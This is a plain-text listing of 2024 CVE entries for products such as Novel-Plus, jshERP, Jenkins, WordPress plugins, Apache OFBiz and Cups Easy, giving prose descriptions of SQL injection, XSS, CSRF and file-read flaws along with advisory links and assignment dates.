CVE    2024    24021    Candidate    A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior. An attacker can pass specially crafted offset, limit, and sort parameters to perform SQL injection via /novel/userFeedback/list.    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24021.txt    Assigned (20240125)
CVE    2024    24019    Candidate    A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL injection via /system/roleDataPerm/list    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24019.txt    Assigned (20240125)
CVE    2024    24018    Candidate    A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL injection via /system/dataPerm/list    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24018.txt    Assigned (20240125)
CVE    2024    24017    Candidate    A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /common/dict/list    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24017.txt    Assigned (20240125)
CVE    2024    24015    Candidate    A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL injection via /sys/user/exit    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24015.txt    Assigned (20240125)
CVE    2024    24014    Candidate    A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /novel/author/list    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24014.txt    Assigned (20240125)
CVE    2024    24013    Candidate    A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /novel/pay/list    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24013.txt    Assigned (20240125)
CVE    2024    24004    Candidate    jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutDetail() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.    MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24004.txt   |   MISC:https://github.com/jishenghua/jshERP/issues/99    Assigned (20240125)
CVE    2024    24003    Candidate    jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutMaterialCount() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.    MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24003.txt   |   MISC:https://github.com/jishenghua/jshERP/issues/99    Assigned (20240125)
CVE    2024    24002    Candidate    jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.MaterialController: com.jsh.erp.utils.BaseResponseInfo getListWithStock() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.    MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24002.txt   |   MISC:https://github.com/jishenghua/jshERP/issues/99    Assigned (20240125)
CVE    2024    24001    Candidate    jshERP v3.3 is vulnerable to SQL Injection via the com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findallocationDetail() function of jshERP, which allows an attacker to construct a malicious payload to bypass jshERP's protection mechanism.    MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24001.txt   |   MISC:https://github.com/jishenghua/jshERP/issues/99    Assigned (20240125)
CVE    2024    24000    Candidate    jshERP v3.3 is vulnerable to Arbitrary File Upload. The jshERP-boot/systemConfig/upload interface does not check the uploaded file type, and the biz parameter can be spliced into the upload path, resulting in arbitrary file uploads with controllable paths.    MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24000.txt   |   MISC:https://github.com/jishenghua/jshERP    Assigned (20240125)
CVE    2024    2400    Candidate    Use after free in Performance Manager in Google Chrome prior to 122.0.6261.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-99d177633f   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T55OZ7JOMLNT5ICM4DTCZOJZD6TZICKO/   |   FEDORA:FEDORA-2024-ac1eb810c5   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VIKPDCUMQNF2DFB7TU3V4ISJ7WFJH7YI/   |   MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_12.html   |   URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_12.html   |   MISC:https://issues.chromium.org/issues/327696052   |   URL:https://issues.chromium.org/issues/327696052    Assigned (20240312)
CVE    2024    2399    Candidate    The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.10.23 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.10.23/widgets/premium-media-wheel.php#L2753   |   URL:https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.10.23/widgets/premium-media-wheel.php#L2753   |   MISC:https://plugins.trac.wordpress.org/changeset/3051259/premium-addons-for-elementor/trunk/widgets/premium-media-wheel.php   |   URL:https://plugins.trac.wordpress.org/changeset/3051259/premium-addons-for-elementor/trunk/widgets/premium-media-wheel.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc057069-15cd-477f-9106-e616e919c62f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc057069-15cd-477f-9106-e616e919c62f?source=cve    Assigned (20240312)
CVE    2024    23985    Candidate    EzServer 6.4.017 allows a denial of service (daemon crash) via a long string, such as one for the RNTO command.    MISC:https://packetstormsecurity.com/files/176663/EzServer-6.4.017-Denial-Of-Service.html    Assigned (20240125)
CVE    2024    23982    Candidate    When a BIG-IP PEM classification profile is configured on a UDP virtual server, undisclosed requests can cause the Traffic Management Microkernel (TMM) to terminate. This issue affects classification engines using signatures released between 09-08-2022 and 02-16-2023. See the table in the F5 Security Advisory for a complete list of affected classification signature files. NOTE: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000135946   |   URL:https://my.f5.com/manage/s/article/K000135946    Assigned (20240201)
CVE    2024    23979    Candidate    When SSL Client Certificate LDAP or Certificate Revocation List Distribution Point (CRLDP) authentication profile is configured on a virtual server, undisclosed requests can cause an increase in CPU resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000134516   |   URL:https://my.f5.com/manage/s/article/K000134516    Assigned (20240201)
CVE    2024    23978    Candidate    Heap-based buffer overflow vulnerability exists in HOME SPOT CUBE2 V102 and earlier. By processing invalid values, arbitrary code may be executed. Note that the affected products are no longer supported.    MISC:https://jvn.jp/en/vu/JVNVU93740658/   |   URL:https://jvn.jp/en/vu/JVNVU93740658/   |   MISC:https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/   |   URL:https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/    Assigned (20240125)
CVE    2024    23976    Candidate    When running in Appliance mode, an authenticated attacker assigned the Administrator role may be able to bypass Appliance mode restrictions utilizing iAppsLX templates on a BIG-IP system. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.    MISC:https://my.f5.com/manage/s/article/K91054692   |   URL:https://my.f5.com/manage/s/article/K91054692    Assigned (20240201)
CVE    2024    23975    Candidate    SQL injection vulnerability exists in GetDIAE_slogListParameters.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12    Assigned (20240312)
CVE    2024    23952    Candidate    This is a duplicate of CVE-2023-46104, with correct CVE version ranges for affected Apache Superset. Uncontrolled resource consumption can be triggered by an authenticated attacker who uploads a malicious ZIP to import database, dashboards or datasets. This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1.    MISC:https://lists.apache.org/thread/zc58zvm4414molqn2m4d4vkrbrsxdksx   |   URL:https://lists.apache.org/thread/zc58zvm4414molqn2m4d4vkrbrsxdksx   |   MLIST:[oss-security] 20240214 CVE-2024-23952: Apache Superset: Allows for uncontrolled resource consumption via a ZIP bomb (version range fix for CVE-2023-46104)   |   URL:http://www.openwall.com/lists/oss-security/2024/02/14/2   |   MLIST:[oss-security] 20240214 Re: CVE-2024-23952: Apache Superset: Allows for uncontrolled resource consumption via a ZIP bomb (version range fix for CVE-2023-46104)   |   URL:http://www.openwall.com/lists/oss-security/2024/02/14/3    Assigned (20240124)
CVE    2024    2395    Candidate    The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.14. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to generate and delete labels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ff1d12e-1129-40d3-8c29-3a46ffc77872?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ff1d12e-1129-40d3-8c29-3a46ffc77872?source=cve    Assigned (20240312)
CVE    2024    23946    Candidate    Possible path traversal in Apache OFBiz allowing file inclusion. Users are recommended to upgrade to version 18.12.12, that fixes the issue.    MISC:https://issues.apache.org/jira/browse/OFBIZ-12884   |   URL:https://issues.apache.org/jira/browse/OFBIZ-12884   |   MISC:https://lists.apache.org/thread/w4lp5ncpzttf41hn5bsc04mzq4o6lw3g   |   URL:https://lists.apache.org/thread/w4lp5ncpzttf41hn5bsc04mzq4o6lw3g   |   MISC:https://ofbiz.apache.org/download.html   |   URL:https://ofbiz.apache.org/download.html   |   MISC:https://ofbiz.apache.org/release-notes-18.12.12.html   |   URL:https://ofbiz.apache.org/release-notes-18.12.12.html   |   MISC:https://ofbiz.apache.org/security.html   |   URL:https://ofbiz.apache.org/security.html   |   MLIST:[oss-security] 20240228 CVE-2024-23946: Apache OFBiz: Path traversal or file inclusion   |   URL:http://www.openwall.com/lists/oss-security/2024/02/28/9    Assigned (20240124)
CVE    2024    23944    Candidate    Information disclosure in persistent watchers handling in Apache ZooKeeper due to a missing ACL check. It allows an attacker to monitor child znodes by attaching a persistent watcher (addWatch command) to a parent to which the attacker already has access. The ZooKeeper server does not perform an ACL check when the persistent watcher is triggered and, as a consequence, the full path of the znodes that a watch event gets triggered upon is exposed to the owner of the watcher. It's important to note that only the path is exposed by this vulnerability, not the data of the znode, but since a znode path can contain sensitive information like a user name or login ID, this issue is potentially critical. Users are recommended to upgrade to version 3.9.2, 3.8.4 which fixes the issue.    MISC:https://lists.apache.org/thread/96s5nqssj03rznz9hv58txdb2k1lr79k   |   URL:https://lists.apache.org/thread/96s5nqssj03rznz9hv58txdb2k1lr79k    Assigned (20240124)
CVE    2024    23941    Candidate    Cross-site scripting vulnerability exists in Group Office prior to v6.6.182, prior to v6.7.64 and prior to v6.8.31, which may allow a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product.    MISC:https://github.com/Intermesh/groupoffice/   |   URL:https://github.com/Intermesh/groupoffice/   |   MISC:https://jvn.jp/en/jp/JVN63567545/   |   URL:https://jvn.jp/en/jp/JVN63567545/   |   MISC:https://www.group-office.com/   |   URL:https://www.group-office.com/    Assigned (20240124)
CVE    2024    23940    Candidate    Trend Micro uiAirSupport, included in the Trend Micro Security 2023 family of consumer products, version 6.0.2092 and below is vulnerable to a DLL hijacking/proxying vulnerability, which if exploited could allow an attacker to impersonate and modify a library to execute code on the system and ultimately escalate privileges on an affected system.    MISC:https://helpcenter.trendmicro.com/en-us/article/tmka-12134   |   URL:https://helpcenter.trendmicro.com/en-us/article/tmka-12134   |   MISC:https://helpcenter.trendmicro.com/ja-jp/article/tmka-12132   |   URL:https://helpcenter.trendmicro.com/ja-jp/article/tmka-12132   |   MISC:https://medium.com/@s1kr10s/av-when-a-friend-becomes-an-enemy-55f41aba42b1   |   URL:https://medium.com/@s1kr10s/av-when-a-friend-becomes-an-enemy-55f41aba42b1    Assigned (20240124)
CVE    2024    2394    Candidate    A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Admin/add-admin.php. The manipulation of the argument avatar leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256454 is the identifier assigned to this vulnerability.    MISC:VDB-256454 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256454   |   MISC:VDB-256454 | SourceCodester Employee Management System add-admin.php unrestricted upload   |   URL:https://vuldb.com/?id.256454   |   MISC:https://github.com/LiAoRJ/CVE_Hunter/blob/main/RCE-1.md   |   URL:https://github.com/LiAoRJ/CVE_Hunter/blob/main/RCE-1.md    Assigned (20240312)
CVE    2024    2393    Candidate    A vulnerability was found in SourceCodester CRUD without Page Reload 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file add_user.php. The manipulation of the argument city leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256453 was assigned to this vulnerability.    MISC:VDB-256453 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256453   |   MISC:VDB-256453 | SourceCodester CRUD without Page Reload add_user.php sql injection   |   URL:https://vuldb.com/?id.256453   |   MISC:https://github.com/CveSecLook/cve/blob/main/CRUD%20(Create%2C%20Read%2C%20Update%2C%20Delete)%20Without%20Page%20Reload%3ARefresh%20Using%20PHP%20and%20MySQL%20with%20Source%20Code%202/sql-1.md   |   URL:https://github.com/CveSecLook/cve/blob/main/CRUD%20(Create%2C%20Read%2C%20Update%2C%20Delete)%20Without%20Page%20Reload%3ARefresh%20Using%20PHP%20and%20MySQL%20with%20Source%20Code%202/sql-1.md    Assigned (20240312)
CVE    2024    2392    Candidate    The Blocksy Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Newsletter widget in all versions up to, and including, 2.0.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051797%40blocksy-companion&new=3051797%40blocksy-companion&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051797%40blocksy-companion&new=3051797%40blocksy-companion&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b937cbfb-d43c-4cda-b247-921661cbc0ad?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b937cbfb-d43c-4cda-b247-921661cbc0ad?source=cve    Assigned (20240312)
CVE    2024    23917    Candidate    In JetBrains TeamCity before 2023.11.3, authentication bypass leading to RCE was possible.    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240123)
CVE    2024    23910    Candidate    Cross-site request forgery (CSRF) vulnerability in ELECOM wireless LAN routers allows a remote unauthenticated attacker to hijack the authentication of administrators and to perform unintended operations to the affected product. Affected products and versions are as follows: WRC-1167GS2-B v1.67 and earlier, WRC-1167GS2H-B v1.67 and earlier, WRC-2533GS2-B v1.62 and earlier, WRC-2533GS2-W v1.62 and earlier, and WRC-2533GS2V-B v1.62 and earlier.    MISC:https://jvn.jp/en/jp/JVN44166658/   |   URL:https://jvn.jp/en/jp/JVN44166658/   |   MISC:https://www.elecom.co.jp/news/security/20240220-01/   |   URL:https://www.elecom.co.jp/news/security/20240220-01/    Assigned (20240215)
CVE    2024    2391    Candidate    A vulnerability was found in EVE-NG 5.0.1-13 and classified as problematic. Affected by this issue is some unknown functionality of the component Lab Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256442 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256442 | CTI Indicators (IOB, IOC, TTP)   |   URL:https://vuldb.com/?ctiid.256442   |   MISC:VDB-256442 | EVE-NG Lab cross site scripting   |   URL:https://vuldb.com/?id.256442   |   MISC:https://www.exploit-db.com/exploits/51153   |   URL:https://www.exploit-db.com/exploits/51153    Assigned (20240312)
CVE    2024    23905    Candidate    Jenkins Red Hat Dependency Analytics Plugin 0.7.1 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download.    MISC:Jenkins Security Advisory 2024-01-24   |   URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3322   |   MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins   |   URL:http://www.openwall.com/lists/oss-security/2024/01/24/6    Assigned (20240123)
CVE    2024    23904    Candidate    Jenkins Log Command Plugin 1.0.2 and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read content from arbitrary files on the Jenkins controller file system.    MISC:Jenkins Security Advisory 2024-01-24   |   URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3334   |   MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins   |   URL:http://www.openwall.com/lists/oss-security/2024/01/24/6    Assigned (20240123)
CVE    2024    23903    Candidate    Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token.    MISC:Jenkins Security Advisory 2024-01-24   |   URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-2871   |   MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins   |   URL:http://www.openwall.com/lists/oss-security/2024/01/24/6    Assigned (20240123)
CVE    2024    23902    Candidate    A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier allows attackers to connect to an attacker-specified URL.    MISC:Jenkins Security Advisory 2024-01-24   |   URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3251   |   MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins   |   URL:http://www.openwall.com/lists/oss-security/2024/01/24/6    Assigned (20240123)
CVE    2024    23901    Candidate    Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier unconditionally discovers projects that are shared with the configured owner group, allowing attackers to configure and share a project, resulting in a crafted Pipeline being built by Jenkins during the next scan of the group.    MISC:Jenkins Security Advisory 2024-01-24   |   URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3040   |   MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins   |   URL:http://www.openwall.com/lists/oss-security/2024/01/24/6    Assigned (20240123)
CVE    2024    23900    Candidate    Jenkins Matrix Project Plugin 822.v01b_8c85d16d2 and earlier does not sanitize user-defined axis names of multi-configuration projects, allowing attackers with Item/Configure permission to create or replace any config.xml files on the Jenkins controller file system with content not controllable by the attackers.    MISC:Jenkins Security Advisory 2024-01-24   |   URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3289   |   MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins   |   URL:http://www.openwall.com/lists/oss-security/2024/01/24/6    Assigned (20240123)
CVE    2024    2390    Candidate    As a part of Tenable’s vulnerability disclosure program, a vulnerability in a Nessus plugin was identified and reported. This vulnerability could allow a malicious actor with sufficient permissions on a scan target to place a binary in a specific filesystem location, and abuse the impacted plugin in order to escalate privileges.    MISC:https://www.tenable.com/security/tns-2024-05   |   URL:https://www.tenable.com/security/tns-2024-05    Assigned (20240311)
CVE    2024    23899    Candidate    Jenkins Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing attackers with Overall/Read permission to read content from arbitrary files on the Jenkins controller file system.    MISC:Jenkins Security Advisory 2024-01-24   |   URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3319   |   MLIST:[oss-security] 20240124 Multiple vulnerabilities in Jenkins and Jenkins plugins   |   URL:http://www.openwall.com/lists/oss-security/2024/01/24/6    Assigned (20240123)
CVE    2024    23898    Candidate    Jenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability, allowing attackers to execute CLI commands on the Jenkins controller.    MISC:Jenkins Security Advisory 2024-01-24   |   URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3315   |   MISC:http://www.openwall.com/lists/oss-security/2024/01/24/6   |   URL:http://www.openwall.com/lists/oss-security/2024/01/24/6    Assigned (20240123)
CVE    2024    23897    Candidate    Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.    MISC:Jenkins Security Advisory 2024-01-24   |   URL:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314   |   MISC:http://packetstormsecurity.com/files/176839/Jenkins-2.441-LTS-2.426.3-CVE-2024-23897-Scanner.html   |   URL:http://packetstormsecurity.com/files/176839/Jenkins-2.441-LTS-2.426.3-CVE-2024-23897-Scanner.html   |   MISC:http://packetstormsecurity.com/files/176840/Jenkins-2.441-LTS-2.426.3-Arbitrary-File-Read.html   |   URL:http://packetstormsecurity.com/files/176840/Jenkins-2.441-LTS-2.426.3-Arbitrary-File-Read.html   |   MISC:http://www.openwall.com/lists/oss-security/2024/01/24/6   |   URL:http://www.openwall.com/lists/oss-security/2024/01/24/6    Assigned (20240123)
CVE    2024    23896    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stock.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23895    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationcreate.php, in the locationid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23894    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancecreate.php, in the issuancedate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23893    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentermodify.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23892    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentercreate.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23891    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemcreate.php, in the itemid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23890    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itempopup.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23889    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemgroupcreate.php, in the itemgroupid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23888    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stocktransactionslist.php, in the itemidy parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
CVE    2024    23887    Candidate    A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grncreate.php, in the grndate parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy    Assigned (20240123)
